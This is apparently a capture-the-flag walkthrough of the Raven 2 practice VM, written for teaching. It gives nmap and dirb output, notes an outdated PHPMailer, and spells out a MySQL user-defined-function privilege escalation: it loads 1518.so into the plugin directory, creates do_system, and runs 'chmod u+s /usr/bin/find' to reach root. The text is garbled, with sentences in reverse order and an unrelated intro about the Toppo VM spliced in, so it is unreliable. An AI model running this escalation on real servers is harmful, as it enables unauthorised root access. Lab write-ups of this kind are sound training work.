Besides, it’s also a nice little brain teaser for the more experienced folk to keep themselves sharp too. After looking around, Toppo seemed to fit the bill quite nicely. Ideally I want to do something that can be completed in a group scenario where everyone can play along and achieve root in a couple of hours tops. The assumption is that they may know about the basic theory behind the stages of rooting a target, but have little by way of hands-on experience. We can get it with a browser.Īll four flags are here and it means that we owned Raven machine.I’ve recently been approached to help introduce some new folk to the wonderful world of ethical hacking. It seems that the last flag is in png format among wordpress uploads. sys/devices/platform/serial8250/tty/ttyS3/flags sys/devices/platform/serial8250/tty/ttyS2/flags sys/devices/platform/serial8250/tty/ttyS1/flags sys/devices/platform/serial8250/tty/ttyS0/flags usr/share/doc/apache2-doc/manual/en/rewrite/flags.html usr/share/doc/apache2-doc/manual/fr/rewrite/flags.html usr/share/doc/apache2-doc/manual/pt-br/rewrite/flags.html usr/share/doc/apache2-doc/manual/da/rewrite/flags.html usr/share/doc/apache2-doc/manual/es/rewrite/flags.html usr/share/doc/apache2-doc/manual/de/rewrite/flags.html usr/share/doc/apache2-doc/manual/zh-cn/rewrite/flags.html usr/share/doc/apache2-doc/manual/ko/rewrite/flags.html usr/share/doc/apache2-doc/manual/ja/rewrite/flags.html usr/share/doc/apache2-doc/manual/tr/rewrite/flags.html Since all the flag files are named in a similar way, we’ll search the whole machine for this pattern: # find / -name 'flag*' /var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png There’s a neat trick to find the last flag. Hit me up on Twitter and let me know what you / I hope you enjoyed this second interation of the Raven VM One of them is in the root directory: cd /rootĬONGRATULATIONS on successfully rooting RavenII Select do_system('chmod u+s /usr/bin/find') Mysql> select do_system('chmod u+s /usr/bin/find') Mysql> create function do_system returns integer soname '1518.so' Ĭreate function do_system returns integer soname '1518.so' Select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so' Mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so' Select * from foo into dumpfile '/tmp/tmp/1518.so' ĮRROR 1 (HY000): Can't create/write to file '/tmp/tmp/1518.so' (Errcode: 2)
Mysql> select * from foo into dumpfile '/tmp/tmp/1518.so' Select * from foo into dumpfile '/usr/lib/mysql/1518/so' ĮRROR 1 (HY000): Can't create/write to file '/usr/lib/mysql/1518/so' (Errcode: 2) Mysql> select * from foo into dumpfile '/usr/lib/mysql/1518/so' Select * from foo into dumpfile '/usr/lib/mysql/plugins/1518.so' ĮRROR 1 (HY000): Can't create/write to file '/usr/lib/mysql/plugins/1518.so' (Errcode: 2)
Mysql> select * from foo into dumpfile '/usr/lib/mysql/plugins/1518.so' Insert into foo values(load_file('/tmp/1518.so')) Mysql> insert into foo values(load_file('/tmp/1518.so')) Let’s follow the instruction further and run all the necessary commands: mysql> create table foo(line blob) It’s very dated so I guess we’ll find something useful with a searchsploit. Let’s also check the phpmailer version: 5.2.16
Let’s take a look at PATH: /var/www/html/vendor/ You can notice that there’s a phpmailer here, but one file for some reason has a different modification date. Are there any websites not powered by WordPress out there now? =) We’ll get to it later, but now let’s go to vendor directory: WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt Nobody does anything from scratch nowdays, so let’s look a little closer: dirb There are several links here and there, but nothing too interesting. There’s also some RPC application, but it doesn’t look promising. Kinda standard – SSH for a remote administration and HTTP for a web server. Nmap done: 1 IP address (1 host up) scanned in 25.89 seconds Service Info: OS: Linux CPE: cpe:/o:linux:linux_kernel OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 |_http-server-header: Apache/2.4.10 (Debian) Virtual machine boots and all we got is this login screen:īut there’s nothing to see here. The only difference here that it has four flags to capture. Raven 2 is another vulnerable intermediate level machine by William McCann.
0 kommentar(er)
